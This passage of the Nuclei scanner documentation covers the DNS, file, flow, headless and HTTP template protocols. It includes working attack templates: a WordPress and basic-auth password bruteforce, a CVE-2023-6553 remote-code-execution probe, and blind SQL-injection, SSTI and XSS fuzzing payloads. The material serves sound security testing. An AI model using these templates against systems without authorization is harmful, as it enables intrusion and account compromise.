```yaml
# Recursion is a boolean determining if the request is recursive
recursion: true
```
### Retries
Retries is the number of times a DNS query is retried across different resolvers before giving up. A reasonable value, like **3**, is recommended.
```yaml
# Retries is a number of retries before giving up on dns resolution
retries: 3
```
### Matchers / Extractor Parts
Valid `part` values supported by **DNS** protocol for Matchers / Extractor are -
| Value | Description |
| ---------------- | --------------------------- |
| request | DNS Request |
| rcode | DNS Rcode |
| question | DNS Question Message |
| extra | DNS Message Extra Field |
| answer | DNS Message Answer Field |
| ns | DNS Message Authority Field |
| raw / all / body | Raw DNS Message |
### **Example DNS Template**
The final example template file, which performs an `A` query and checks if CNAME and A records are present in the response, is as follows:
```yaml
id: dummy-cname-a
info:
name: Dummy A dns request
author: mzack9999
severity: info
description: Checks if CNAME and A record is returned.
dns:
- name: "{{FQDN}}"
type: A
class: inet
recursion: true
retries: 3
matchers:
- type: word
words:
# The response must contain a CNAME record
- "IN\tCNAME"
# and also at least 1 A record
- "IN\tA"
condition: and
```
More complete examples are provided [here](/templates/protocols/dns-examples)
# File Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/file
Learn about using Nuclei to work with the local file system
## Overview
Nuclei allows modelling templates that can match/extract on the local file system.
```yaml
# Start of file template block
file:
```
## Extensions
To match on all extensions (except the ones in default denylist), use the following -
```yaml
extensions:
- all
```
You can also provide a list of custom extensions that should be matched upon.
```yaml
extensions:
- py
- go
```
A denylist of extensions can also be provided. Files with these extensions will not be processed by nuclei.
```yaml
extensions:
- all
denylist:
- go
- py
- txt
```
By default, certain extensions are excluded in nuclei file module. A list of these is provided below-
```
3g2,3gp,7z,apk,arj,avi,axd,bmp,css,csv,deb,dll,doc,drv,eot,exe,
flv,gif,gifv,gz,h264,ico,iso,jar,jpeg,jpg,lock,m4a,m4v,map,mkv,
mov,mp3,mp4,mpeg,mpg,msi,ogg,ogm,ogv,otf,pdf,pkg,png,ppt,psd,rar,
rm,rpm,svg,swf,sys,tar,tar.gz,tif,tiff,ttf,txt,vob,wav,webm,wmv,
woff,woff2,xcf,xls,xlsx,zip
```
## More Options
The **max-size** parameter limits the maximum size (in bytes) of files read by the nuclei engine.
By default, the `max-size` value is 5 MB (5242880 bytes); files larger than `max-size` will not be processed.
***
The **no-recursive** option disables recursive walking of directories/globs while input is being processed by the file module of nuclei.
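Both options sit alongside `extensions` in the file block. A minimal sketch (the 1 MB limit is just an example value):
```yaml
file:
  - extensions:
      - all
    # limit files read to roughly 1 MB (value in bytes; example only)
    max-size: 1048576
    # do not walk directories recursively
    no-recursive: true
```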
## Matchers / Extractors
**File** protocol supports 2 types of Matchers -
| Matcher Type | Part Matched |
| ------------ | ------------ |
| word | all |
| regex | all |
| Extractors Type | Part Matched |
| --------------- | ------------ |
| word | all |
| regex | all |
## **Example File Template**
The final example template file, which detects Google API keys in files, is provided below.
```yaml
id: google-api-key
info:
name: Google API Key
author: pdteam
severity: info
file:
- extensions:
- all
- txt
extractors:
- type: regex
name: google-api-key
regex:
- "AIza[0-9A-Za-z\\-_]{35}"
```
```bash
# Running file template on http-response/ directory
nuclei -t file.yaml -file -target http-response/
# Running file template on output.txt
nuclei -t file.yaml -file -target output.txt
```
More complete examples are provided [here](/templates/protocols/file-examples)
# Flow Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/flow
Learn about the template flow engine in Nuclei v3
## Overview
The template flow engine was introduced in nuclei v3, and brings two significant enhancements to Nuclei:
* The ability to [conditionally execute requests](#conditional-execution)
* The [orchestration of request execution](#request-execution-orchestration)
These features are implemented using JavaScript (ECMAScript 5.1) via the [goja](https://github.com/dop251/goja) backend.
## Conditional Execution
Many times when writing complex templates, we might need to add some extra checks (or conditional statements) before executing a certain part of the request.
An ideal example of this is [bruteforcing a WordPress login](https://cloud.projectdiscovery.io/public/wordpress-weak-credentials) with default usernames and passwords. If we carefully re-evaluate that template, we can see that it sends 276 requests without even checking whether the URL exists or the target site is actually running WordPress.
With the addition of flow in Nuclei v3, we can rewrite this template to first check if the target is a WordPress site and, only if it is, bruteforce the login with default credentials. This can be achieved by simply adding one line, i.e. `flow: http(1) && http(2)`, and nuclei will take care of everything else.
```yaml
id: wordpress-bruteforce
info:
name: WordPress Login Bruteforce
author: pdteam
severity: high
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-login.php"
matchers:
- type: word
words:
- "WordPress"
- method: POST
path:
- "{{BaseURL}}/wp-login.php"
body: |
log={{username}}&pwd={{password}}&wp-submit=Log+In
attack: clusterbomb
payloads:
users: helpers/wordlists/wp-users.txt
passwords: helpers/wordlists/wp-passwords.txt
matchers:
- type: dsl
dsl:
- status_code == 302
- contains_all(header, "/wp-admin","wordpress_logged_in")
condition: and
```
The updated template is now straightforward and easy to understand: we first check if the target is a WordPress site and then execute the bruteforce requests. This is just a simple example of conditional execution; flow accepts any JavaScript (ECMAScript 5.1) expression/code, so you are free to craft any conditional execution logic you want.
## Request Execution Orchestration
Flow is a powerful Nuclei feature that provides enhanced orchestration capabilities for executing requests. The simplicity of conditional execution is just the beginning. With flow, you can:
* Iterate over a list of values and execute a request for each one
* Extract values from a request, iterate over them, and perform another request for each
* Get and set values within the template context (global variables)
* Write output to stdout for debugging purposes or based on specific conditions
* Introduce custom logic during template execution
* Use ECMAScript 5.1 JavaScript features to build and modify variables at runtime
* Update variables at runtime and use them in subsequent requests.
Think of request execution orchestration as a bridge between JavaScript and Nuclei, offering two-way interaction within a specific template.
**Practical Example: Vhost Enumeration**
To better illustrate the power of flow, let's consider developing a template for vhost (virtual host) enumeration. This set of tasks typically requires writing a new tool from scratch. Here are the steps we need to follow:
1. Retrieve the SSL certificate for the provided IP (using tlsx)
* Extract `subject_cn` (CN) from the certificate
* Extract `subject_an` (SAN) from the certificate
* Remove wildcard prefixes from the values obtained in the steps above
2. Bruteforce the request using all the domains found from the SSL request
You can utilize flow to simplify this task. The JavaScript code below orchestrates the vhost enumeration:
```javascript
ssl();
for (let vhost of iterate(template["ssl_domains"])) {
set("vhost", vhost);
http();
}
```
In this code, we've introduced 5 extra lines of JavaScript. This allows the template to perform vhost enumeration. The best part? You can run this at scale with all features of Nuclei, using supported inputs like ASN, CIDR, URL.
Let's break down the JavaScript code:
1. `ssl()`: This function executes the SSL request.
2. `template["ssl_domains"]`: Retrieves the value of `ssl_domains` from the template context.
3. `iterate()`: Helper function that iterates over any value type while handling empty or null values.
4. `set("vhost", vhost)`: Creates a new variable `vhost` in the template and assigns the `vhost` variable's value to it.
5. `http()`: This function conducts the HTTP request.
By understanding and taking advantage of Nuclei's `flow`, you can redefine the way you orchestrate request executions, making your templates much more powerful and efficient.
Here is working template for vhost enumeration using flow:
```yaml
id: vhost-enum-flow
info:
name: vhost enum flow
author: tarunKoyalwar
severity: info
description: |
vhost enumeration by extracting potential vhost names from ssl certificate.
flow: |
ssl();
for (let vhost of iterate(template["ssl_domains"])) {
set("vhost", vhost);
http();
}
ssl:
- address: "{{Host}}:{{Port}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{vhost}}
matchers:
- type: dsl
dsl:
- status_code != 400
- status_code != 502
extractors:
- type: dsl
dsl:
- '"VHOST: " + vhost + ", SC: " + status_code + ", CL: " + content_length'
```
## JS Bindings
This section contains a brief description of all nuclei JS bindings and their usage.
### Protocol Execution Function
In nuclei, any listed protocol can be invoked or executed in JavaScript using the `protocol_name()` format. For example, you can use `http()`, `dns()`, `ssl()`, etc.
If you want to execute a specific request of a protocol (refer to nuclei-flow-dns for an example), it can be achieved by passing either:
* The index of that request in the protocol (e.g.,`dns(1)`, `dns(2)`)
* The ID of that request in the protocol (e.g., `dns("extract-vps")`, `http("probe-http")`)
For more advanced scenarios where multiple requests of a single protocol need to be executed, you can specify their index or ID one after the other (e.g., `dns("extract-vps","1")`).
This flexibility in using either index numbers or ID strings to call specific protocol requests provides control for tailored execution, allowing you to build more complex and efficient workflows.
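For instance, a flow might mix both styles; the `probe-http` id below is illustrative and must match an `id` defined on the corresponding HTTP request:
```javascript
// execute the first DNS request defined in the template,
// then an HTTP request referenced by its id
dns(1);
http("probe-http");
```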
### Iterate Helper Function
Iterate is a nuclei JS helper function which can be used to iterate over any type of value, like **array**, **map**, **string**, or **number**, while handling empty/nil values.
This helper function removes the boilerplate of checking whether a value is empty before iterating over it.
```javascript
iterate(123,{"a":1,"b":2,"c":3})
// iterate over array with custom separator
iterate([1,2,3,4,5], " ")
```
### Set Helper Function
When iterating over values/arrays, or in other use cases, we might want to invoke a request with a custom/given value. This can be achieved using the `set()` helper function. When invoked, it adds the given variable to the template context (global variables), and that value is used during execution of the request/protocol. The format of `set()` is `set("variable_name", value)`, e.g. `set("username", "admin")`.
```javascript
for (let vhost of myArray) {
set("vhost", vhost);
http(1)
}
```
**Note:** In the above example, we used `set("vhost", vhost)`, which added `vhost` to the template context (global variables), and then called `http(1)`, which used this value in the request.
### Template Context
A template context is a map containing all template data, along with internal/unexported data that is only available at runtime (e.g. extracted values from previous requests, variables added using `set()`, etc.). This template context is available in JavaScript as the `template` variable and can be used to access any of that data, e.g. `template["dns_cname"]`, `template["ssl_subject_cn"]`.
```javascript
template["ssl_domains"] // returns value of ssl_domains from template context which is available after executing ssl request
template["ptrValue"] // returns value of ptrValue which was extracted using regex with internal: true
```
Often we don't know exactly what data is available in the template context; this can easily be found by printing it to stdout using the `log()` function:
```javascript
log(template)
```
### Log Helper Function
It is the nuclei JS alternative to `console.log`, and it pretty-prints map data in a readable format.
**Note:** This should be used for debugging purposes only, as it prints data to stdout.
### Dedupe
Often just having arrays/slices is not enough, and we might need to remove duplicate values. For example, in the earlier vhost enumeration we did not remove any duplicates, even though there is always a chance of duplicate values in `ssl_subject_cn` and `ssl_subject_an`. This can be achieved using the `Dedupe` object, a nuclei JS helper that abstracts away the boilerplate of removing duplicates from an array/slice.
```javascript
let uniq = new Dedupe(); // create new dedupe object
uniq.Add(template["ptrValue"])
uniq.Add(template["ssl_subject_cn"]);
uniq.Add(template["ssl_subject_an"]);
log(uniq.Values())
```
And that's it: this automatically converts any slice/array to a map, removes duplicates from it, and returns a slice/array of unique values.
> Similar to DSL helper functions, we can either use the built-in functions available with `JavaScript (ECMAScript 5.1)` or use DSL helper functions; it is up to the user to decide which to use.
### Skip Internal Matchers in MultiProtocol / Flow Templates
Before nuclei v3.1.4, a template like [`CVE-2023-43177`](https://github.com/projectdiscovery/nuclei-templates/blob/c5be73e328ebd9a0c122ea0324f60bbdd7eb940d/http/cves/2023/CVE-2023-43177.yaml#L28), which has multiple requests/protocols and uses `flow` for logic, used to return only one result, but this conflicted with the logic when a `for` loop was used in `flow`. To fix this, from v3.1.4 the nuclei engine prints all events/results in a template, and template writers can use `internal: true` in matchers to skip printing of specific events/results, just like dynamic extractors.
Note: this is only relevant if matchers/extractors are used in previous requests/protocols
Example of [`CVE-2023-6553`](https://github.com/projectdiscovery/nuclei-templates/blob/c5be73e328ebd9a0c122ea0324f60bbdd7eb940d/http/cves/2023/CVE-2023-6553.yaml#L21) with new `internal: true` logic would be
```yaml
id: CVE-2023-6553
info:
name: WordPress Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution
author: FLX
severity: critical
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Backup Migration")'
condition: and
internal: true # <- updated logic (this will skip printing this event/result)
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php"
headers:
Content-Dir: "{{rand_text_alpha(10)}}"
matchers:
- type: dsl
dsl:
- 'len(body) == 0'
- 'status_code == 200'
- '!contains(body, "Incorrect parameters")'
condition: and
```
# Headless Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/headless
Learn about using a headless browser with Nuclei
Nuclei supports automation of a browser with simple DSL. Headless browser engine can be fully customized and user actions can be scripted allowing complete control over the browser. This allows for a variety of unique and custom workflows.
```yaml
# Start the requests for the template right here
headless:
```
## Actions
An action is a single task for the Nuclei headless engine. Each action manipulates the browser state in some way, finally leading to the state that we are interested in capturing.
Nuclei supports a variety of actions. A list of these Actions along with their arguments are given below:
### navigate
Navigate visits a given URL. The `url` field supports variables like `{{BaseURL}}` and `{{Hostname}}` to customize the request fully.
```yaml
action: navigate
args:
url: "{{BaseURL}}
```
### script
Script runs a JS code on the current browser page. At the simplest level, you can just provide a `code` argument with the JS snippet you want to execute, and it will be run on the page.
```yaml
action: script
args:
code: alert(document.domain)
```
Suppose you want to run a matcher on a JS object to inspect its value. This type of data extraction use case is also supported with nuclei headless. As an example, let's say the application sets an object called `window.random-object` with a value, and you want to match on that value.
```yaml
- action: script
args:
code: window.random-object
name: script-name
...
matchers:
- type: word
part: script-name
words:
- "some-value"
```
Nuclei supports running custom JavaScript before the page loads using the `hook` argument. This will always run the provided JavaScript before any of the pages load.
The example provided hooks `window.alert` so that the alerts that are generated by the application do not stop the crawler.
```yaml
- action: script
args:
code: (function() { window.alert=function(){} })()
hook: true
```
This is just one use case; there are many more uses of function hooking, such as DOM XSS detection and JavaScript-injection based testing techniques. Further examples are provided on the examples page.
### click
Click simulates clicking with the Left-Mouse button on an element specified by a selector.
```yaml
action: click
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
Nuclei supports a variety of selector types, including but not limited to XPath, Regex, CSS, etc. For more information about selectors, see [here](#selectors).
### rightclick
RightClick simulates clicking with the Right-Mouse button on an element specified by a selector.
```yaml
action: rightclick
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
### text
Text simulates typing something into an input with Keyboard. Selectors can be used to specify the element to type in.
```yaml
action: text
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
value: username
```
### screenshot
Screenshot takes a screenshot of a page and writes it to disk. It supports both full-page and normal screenshots.
```yaml
action: screenshot
args:
to: /root/test/screenshot-web
```
If you require a full-page screenshot, it can be achieved with the `fullpage: true` option in the args.
```yaml
action: screenshot
args:
to: /root/test/screenshot-web
fullpage: true
```
### time
Time enters values into time inputs on pages in RFC3339 format.
```yaml
action: time
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
value: 2006-01-02T15:04:05Z07:00
```
### select
Select performs selection on an HTML Input by a selector.
```yaml
action: select
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
selected: true
value: option[value=two]
selector: regex
```
### files
Files handles a file upload input on the webpage.
```yaml
action: files
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
value: /root/test/payload.txt
```
### waitfcp
WaitFCP waits for the first piece of meaningful content, such as text or an image, indicating that the page is becoming useful.
```yaml
action: waitfcp
```
### waitfmp
WaitFMP waits for the First Meaningful Paint event, allowing users to proceed when content is visually ready.
```yaml
action: waitfmp
```
### waitdom
WaitDOM waits for the `DOMContentLoaded` event, indicating that the HTML has been loaded and parsed, but without waiting for stylesheets, images, and subframes to finish loading.
```yaml
action: waitdom
```
### waitload
WaitLoad waits until the entire page, including dependent resources like stylesheets and images, has been fully loaded.
```yaml
action: waitload
```
### waitidle
WaitIdle waits until the page has completely stopped making network requests and reaches a network-idle state, indicating that all resources have been loaded.
```yaml
action: waitidle
```
### waitstable
WaitStable waits until the page is stable for *N* duration *(default is `1s`)*.
```yaml
action: waitstable
args:
duration: 5s
```
### waitdialog
WaitDialog will wait for a JavaScript dialog (`alert`, `confirm`, `prompt`, or `onbeforeunload`) to be initialized and then automatically accept it.
```yaml
action: waitdialog
name: alert
args:
max-duration: 5s # (Optional. Default 10s.)
```
This action is useful for detecting triggered XSS payloads with a high level of accuracy and a low rate of false positives.
The `name` property MUST be explicitly defined to ensure the output variable is available for later use by `matchers` or `extractors` within your template. See the example [here](/templates/protocols/headless-examples#xss-detection).
**Output variables:**
* **NAME** *(boolean)*, indicator of JavaScript dialog triggered.
* **NAME\_type** *(string)*, dialog type (`alert`, `confirm`, `prompt`, or `onbeforeunload`).
* **NAME\_message** *(string)*, displayed message dialog.
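As a minimal sketch of how these variables might be consumed, assuming the action was given `name: alert` as in the snippet above (the exact matcher wiring will depend on your template):
```yaml
matchers:
  - type: dsl
    dsl:
      # dialog fired and its message contains our marker string (illustrative)
      - 'alert == true && contains(alert_message, "XSS")'
```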
### getresource
GetResource returns the src attribute for an element.
```yaml
action: getresource
name: extracted-value-src
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
### extract
Extract extracts either the Text for an HTML Node, or an attribute as specified by the user.
The below code will extract the Text for the given XPath Selector Element, which can then also be matched upon by name `extracted-value` with matchers and extractors.
```yaml
action: extract
name: extracted-value
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
An attribute can also be extracted for an element. For example -
```yaml
action: extract
name: extracted-value-href
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
target: attribute
attribute: href
```
### setmethod
SetMethod overrides the method for the request.
```yaml
action: setmethod
args:
part: request
method: DELETE
```
### addheader
AddHeader adds a header to the requests / responses. This does not overwrite any pre-existing headers.
```yaml
action: addheader
args:
part: response # can be request too
key: Content-Security-Policy
value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
```
### setheader
SetHeader sets a header in the requests / responses.
```yaml
action: setheader
args:
part: response # can be request too
key: Content-Security-Policy
value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
```
### deleteheader
DeleteHeader deletes a header from requests / responses.
```yaml
action: deleteheader
args:
part: response # can be request too
key: Content-Security-Policy
```
### setbody
SetBody sets the body for a request / response.
```yaml
action: setbody
args:
part: response # can be request too
body: '{"success":"ok"}'
```
### waitevent
WaitEvent waits for an event to trigger on the page.
```yaml
action: waitevent
args:
event: 'Page.loadEventFired'
```
The list of events supported are listed [here](https://github.com/go-rod/rod/blob/master/lib/proto/definitions.go).
### keyboard
Keyboard simulates a single key-press on the keyboard.
```yaml
action: keyboard
args:
keys: '\r' # this simulates pressing enter key on keyboard
```
`keys` argument accepts key-codes.
### debug
Debug adds a delay of 5 seconds between each headless action and also shows a trace of all the headless events occurring in the browser.
> Note: Only use this for debugging purposes, don't use this in production templates.
```yaml
action: debug
```
### sleep
Sleep makes the browser wait for a specified duration in seconds. This is also useful for debugging purposes.
```yaml
action: sleep
args:
duration: 5
```
## Selectors
Selectors are how the nuclei headless engine identifies which element to execute an action on. Nuclei supports a variety of selector types, including the following -
| Selector | Description |
| -------------------- | --------------------------------------------------- |
| `r` / `regex` | Element matches CSS Selector and Text Matches Regex |
| `x` / `xpath` | Element matches XPath selector |
| `js` | Return elements from a JS function |
| `search` | Search for a query (can be text, XPATH, CSS) |
| `selector` (default) | Element matches CSS Selector |
## Matchers / Extractor Parts
Valid `part` values supported by **Headless** protocol for Matchers / Extractor are -
| Value | Description |
| ----------------- | ------------------------------- |
| request | Headless Request |
| `<name>`          | Action names with stored values |
| raw / body / data | Final DOM response from browser |
## Example Headless Templates
An example headless template to automatically login into DVWA is provided below -
```yaml
id: dvwa-headless-automatic-login
info:
name: DVWA Headless Automatic Login
author: pdteam
severity: high
headless:
- steps:
- args:
url: "{{BaseURL}}/login.php"
action: navigate
- action: waitload
- args:
by: xpath
xpath: /html/body/div/div[2]/form/fieldset/input
action: click
- action: waitload
- args:
by: xpath
value: admin
xpath: /html/body/div/div[2]/form/fieldset/input
action: text
- args:
by: xpath
xpath: /html/body/div/div[2]/form/fieldset/input[2]
action: click
- action: waitload
- args:
by: xpath
value: password
xpath: /html/body/div/div[2]/form/fieldset/input[2]
action: text
- args:
by: xpath
xpath: /html/body/div/div[2]/form/fieldset/p/input
action: click
- action: waitload
matchers:
- part: resp
type: word
words:
- "You have logged in as"
```
More complete examples are provided [here](/templates/protocols/headless-examples).
# Basic HTTP Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/http/basic-http
Learn about using Basic HTTP with Nuclei
Nuclei offers extensive support for various features related to the HTTP protocol. Both raw and model-based HTTP requests are supported, along with support for non-RFC-compliant client requests. Payloads can also be specified, and raw requests can be transformed based on payload values, along with many more capabilities shown later on this page.
HTTP requests start with an `http` block which specifies the start of the requests for the template.
```yaml
# Start the requests for the template right here
http:
```
## Method
Request method can be **GET**, **POST**, **PUT**, **DELETE**, etc. depending on the needs.
```yaml
# Method is the method for the request
method: GET
```
**Redirects**
Redirection conditions can be specified per template. By default, redirects are not followed. However, if desired, they can be enabled with `redirects: true` in the request details. A maximum of 10 redirects are followed by default, which should be good enough for most use cases. More fine-grained control over the number of redirects followed can be exercised using the `max-redirects` field.
An example of the usage:
```yaml
http:
- method: GET
path:
- "{{BaseURL}}/login.php"
redirects: true
max-redirects: 3
```
Currently redirects are defined per template, not per request.
## Path
The next part of the request is the **path** to request. Dynamic variables can be placed in the path to modify its behavior at runtime.
Variables start with `{{` and end with `}}` and are case-sensitive.
`{{BaseURL}}` - Replaced at runtime with the input URL as specified in the target file.
`{{RootURL}}` - Replaced at runtime with the root URL as specified in the target file.
`{{Hostname}}` - Replaced at runtime with the hostname, including the port, of the target.
`{{Host}}` - Replaced at runtime with the input host as specified in the target file.
`{{Port}}` - Replaced at runtime with the input port as specified in the target file.
`{{Path}}` - Replaced at runtime with the input path as specified in the target file.
`{{File}}` - Replaced at runtime with the input filename as specified in the target file.
`{{Scheme}}` - Replaced at runtime with the protocol scheme as specified in the target file.
An example for the input URL [https://example.com:443/foo/bar.php](https://example.com:443/foo/bar.php) is provided below:
| Variable | Value |
| -------------- | -------------------------------------------------------------------------- |
| `{{BaseURL}}` | [https://example.com:443/foo/bar.php](https://example.com:443/foo/bar.php) |
| `{{RootURL}}` | [https://example.com:443](https://example.com:443) |
| `{{Hostname}}` | example.com:443 |
| `{{Host}}` | example.com |
| `{{Port}}` | 443 |
| `{{Path}}` | /foo |
| `{{File}}` | bar.php |
| `{{Scheme}}` | https |
Some sample dynamic variable replacement examples:
```yaml
path: "{{BaseURL}}/.git/config"
# This path will be replaced on execution with BaseURL
# If BaseURL is set to https://abc.com then the
# path will get replaced to the following: https://abc.com/.git/config
```
Multiple paths can also be specified in one request, and each will be requested for the target.
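For instance, a minimal sketch with two paths (the second path is illustrative):
```yaml
path:
  - "{{BaseURL}}/.git/config"
  - "{{BaseURL}}/.env"
```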
## Headers
Headers can also be specified to be sent along with the requests. Headers are defined as key/value pairs. An example header configuration looks like this:
```yaml
# headers contain the headers for the request
headers:
# Custom user-agent header
User-Agent: Some-Random-User-Agent
# Custom request origin
Origin: https://google.com
```
## Body
Body specifies a body to be sent along with the request. For instance:
```yaml
# Body is a string sent along with the request
body: "{\"some random JSON\"}"
# Body is a string sent along with the request
body: "admin=test"
```
## Session
To maintain a cookie-based browser-like session between multiple requests, cookies are reused by default. This is beneficial when you want to maintain a session between a series of requests to complete the exploit chain or to perform authenticated scans. If you need to disable this behavior, you can use the `disable-cookie` field.
```yaml
# disable-cookie accepts boolean input and false as default
disable-cookie: true
```
## Request Condition
Request conditions allow checking for conditions between multiple requests when writing complex checks and exploits that involve various HTTP requests to complete the exploit chain.
The functionality will be automatically enabled if DSL matchers/extractors contain numbers as a suffix with respective attributes.
For example, the attribute `status_code` will point to the effective status code of the current request/response pair in elaboration. Previous responses status codes are accessible by suffixing the attribute name with `_n`, where n is the n-th ordered request 1-based. So if the template has four requests and we are currently at number 3:
* `status_code`: will refer to the response code of request number 3
* `status_code_1` and `status_code_2` will refer to the response codes of the sequential responses number one and two
For example, with `status_code_1`, `status_code_2`, and `body_2`:
```yaml
matchers:
- type: dsl
dsl:
- "status_code_1 == 404 && status_code_2 == 200 && contains((body_2), 'secret_string')"
```
Request conditions might require more memory as all attributes of previous responses are kept in memory.
## Example HTTP Template
The final template file for the `.git/config` file mentioned above is as follows:
```yaml
id: git-config
info:
name: Git Config File
author: Ice3man
severity: medium
description: Searches for the pattern /.git/config on passed URLs.
http:
- method: GET
path:
- "{{BaseURL}}/.git/config"
matchers:
- type: word
words:
- "[core]"
```
More complete examples are provided [here](/templates/protocols/http/basic-http-examples)
# Connection Tampering
Source: https://docs.projectdiscovery.io/templates/protocols/http/connection-tampering
Learn more about using HTTP pipelining and connection pooling with Nuclei
### Pipelining
HTTP pipelining support has been added, which allows multiple HTTP requests to be sent on the same connection, inspired by [http-desync-attacks-request-smuggling-reborn](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn).
Before running HTTP pipelining based templates, make sure the target supports HTTP pipelined connections; otherwise the nuclei engine falls back to the standard HTTP request engine.
If you want to confirm that a given domain or list of subdomains supports HTTP pipelining, [httpx](https://github.com/projectdiscovery/) has a `-pipeline` flag to do so.
An example configuration showing the pipelining attributes of nuclei:
```yaml
unsafe: true
pipeline: true
pipeline-concurrent-connections: 40
pipeline-requests-per-connection: 25000
```
An example template demonstrating the pipelining capabilities of nuclei is provided below:
```yaml
id: pipeline-testing
info:
name: pipeline testing
author: pdteam
severity: info
http:
- raw:
- |+
GET /{{path}} HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
attack: batteringram
payloads:
path: path_wordlist.txt
unsafe: true
pipeline: true
pipeline-concurrent-connections: 40
pipeline-requests-per-connection: 25000
matchers:
- type: status
part: header
status:
- 200
```
### Connection pooling
While earlier versions of nuclei did not do connection pooling, users can now configure templates to either use HTTP connection pooling or not. This allows for faster scanning based on the requirement.
To enable connection pooling in the template, the `threads` attribute can be defined with the number of threads you want to use in the payloads section.
The `Connection: Close` header cannot be used in an HTTP connection pooling template; otherwise the engine will fail and fall back to standard HTTP requests.
An example template using HTTP connection pooling:
```yaml
id: fuzzing-example
info:
name: Connection pooling example
author: pdteam
severity: info
http:
- raw:
- |
GET /protected HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('admin:§password§')}}
attack: batteringram
payloads:
password: password.txt
threads: 40
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Unique string"
part: body
```
# Fuzzing Examples
Source: https://docs.projectdiscovery.io/templates/protocols/http/fuzzing-examples
Review some examples of fuzzing with Nuclei
## Basic SSTI Template
A simple template to discover `{{*}}` type SSTI vulnerabilities.
```yaml
id: fuzz-reflection-ssti
info:
name: Basic Reflection Potential SSTI Detection
author: pdteam
severity: low
variables:
first: "{{rand_int(10000, 99999)}}"
second: "{{rand_int(10000, 99999)}}"
result: "{{to_number(first)*to_number(second)}}"
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
reflection:
- '{{concat("{{", "§first§*§second§", "}}")}}'
fuzzing:
- part: query
type: postfix
mode: multiple
fuzz:
- "{{reflection}}"
matchers:
- type: word
part: body
words:
- "{{result}}"
```
## Blind Time Based SQLi Template
A template to detect blind time based SQLi with a time delay analyzer.
```yaml
id: mysql-blind-time-based-sqli
info:
name: MySQL SQLi - Blind Time based
author: pdteam
severity: critical
reference:
- https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SqlInjectionMySqlScanRule.java
http:
- payloads:
injections:
low:
- " / sleep([SLEEPTIME]) "
- "' / sleep([SLEEPTIME]) / '"
- "\" / sleep([SLEEPTIME]) / \""
medium:
- " and 0 in (select sleep([SLEEPTIME]) ) -- "
- "' and 0 in (select sleep([SLEEPTIME]) ) -- "
- "\" and 0 in (select sleep([SLEEPTIME]) ) -- "
- " where 0 in (select sleep([SLEEPTIME]) ) -- "
- "' where 0 in (select sleep([SLEEPTIME]) ) -- "
- "\" where 0 in (select sleep([SLEEPTIME]) ) -- "
high:
- "\" where 0 in (select sleep([SLEEPTIME]) ) and \"\"=\""
- " and 0 in (select sleep([SLEEPTIME]) ) "
- "' and 0 in (select sleep([SLEEPTIME]) ) and ''='"
- "\" and 0 in (select sleep([SLEEPTIME]) ) and \"\"=\""
attack: pitchfork
analyzer:
name: time_delay
fuzzing:
- part: request # fuzz all the request parts.
type: postfix
mode: single
fuzz:
- "{{injections}}"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: analyzer
words:
- "true"
```
## Basic XSS Template
A simple template to discover XSS probe reflection in HTML pages.
```yaml
id: fuzz-reflection-xss
info:
name: Basic Reflection Potential XSS Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
reflection:
- "6842'\"><9967"
stop-at-first-match: true
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{reflection}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{reflection}}"
- type: word
part: header
words:
- "text/html"
```
## Basic OpenRedirect Template
A simple template to discover open-redirect issues.
```yaml
id: fuzz-open-redirect
info:
name: Basic Open Redirect Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
redirect:
- "https://example.com"
fuzzing:
- part: query
type: replace
mode: single
keys-regex:
- "redirect.*"
fuzz:
- "{{redirect}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "{{redirect}}"
- type: status
status:
- 301
- 302
- 307
```
## Basic Path Based SQLi
An example template to discover path-based SQLi issues.
```yaml
http:
# pre-condition to determine if the template should be executed
- pre-condition:
- type: dsl
dsl:
- 'method == "POST"' # only run if method is POST
- 'contains(path,"reset")' # only run if path contains reset word
condition: and
# fuzzing rules
fuzzing:
- part: header # This rule will be applied to the header
type: replace # replace the type of rule (i.e., existing values will be replaced with payload)
mode: multiple # multiple mode (i.e., all existing values will be replaced/used at once)
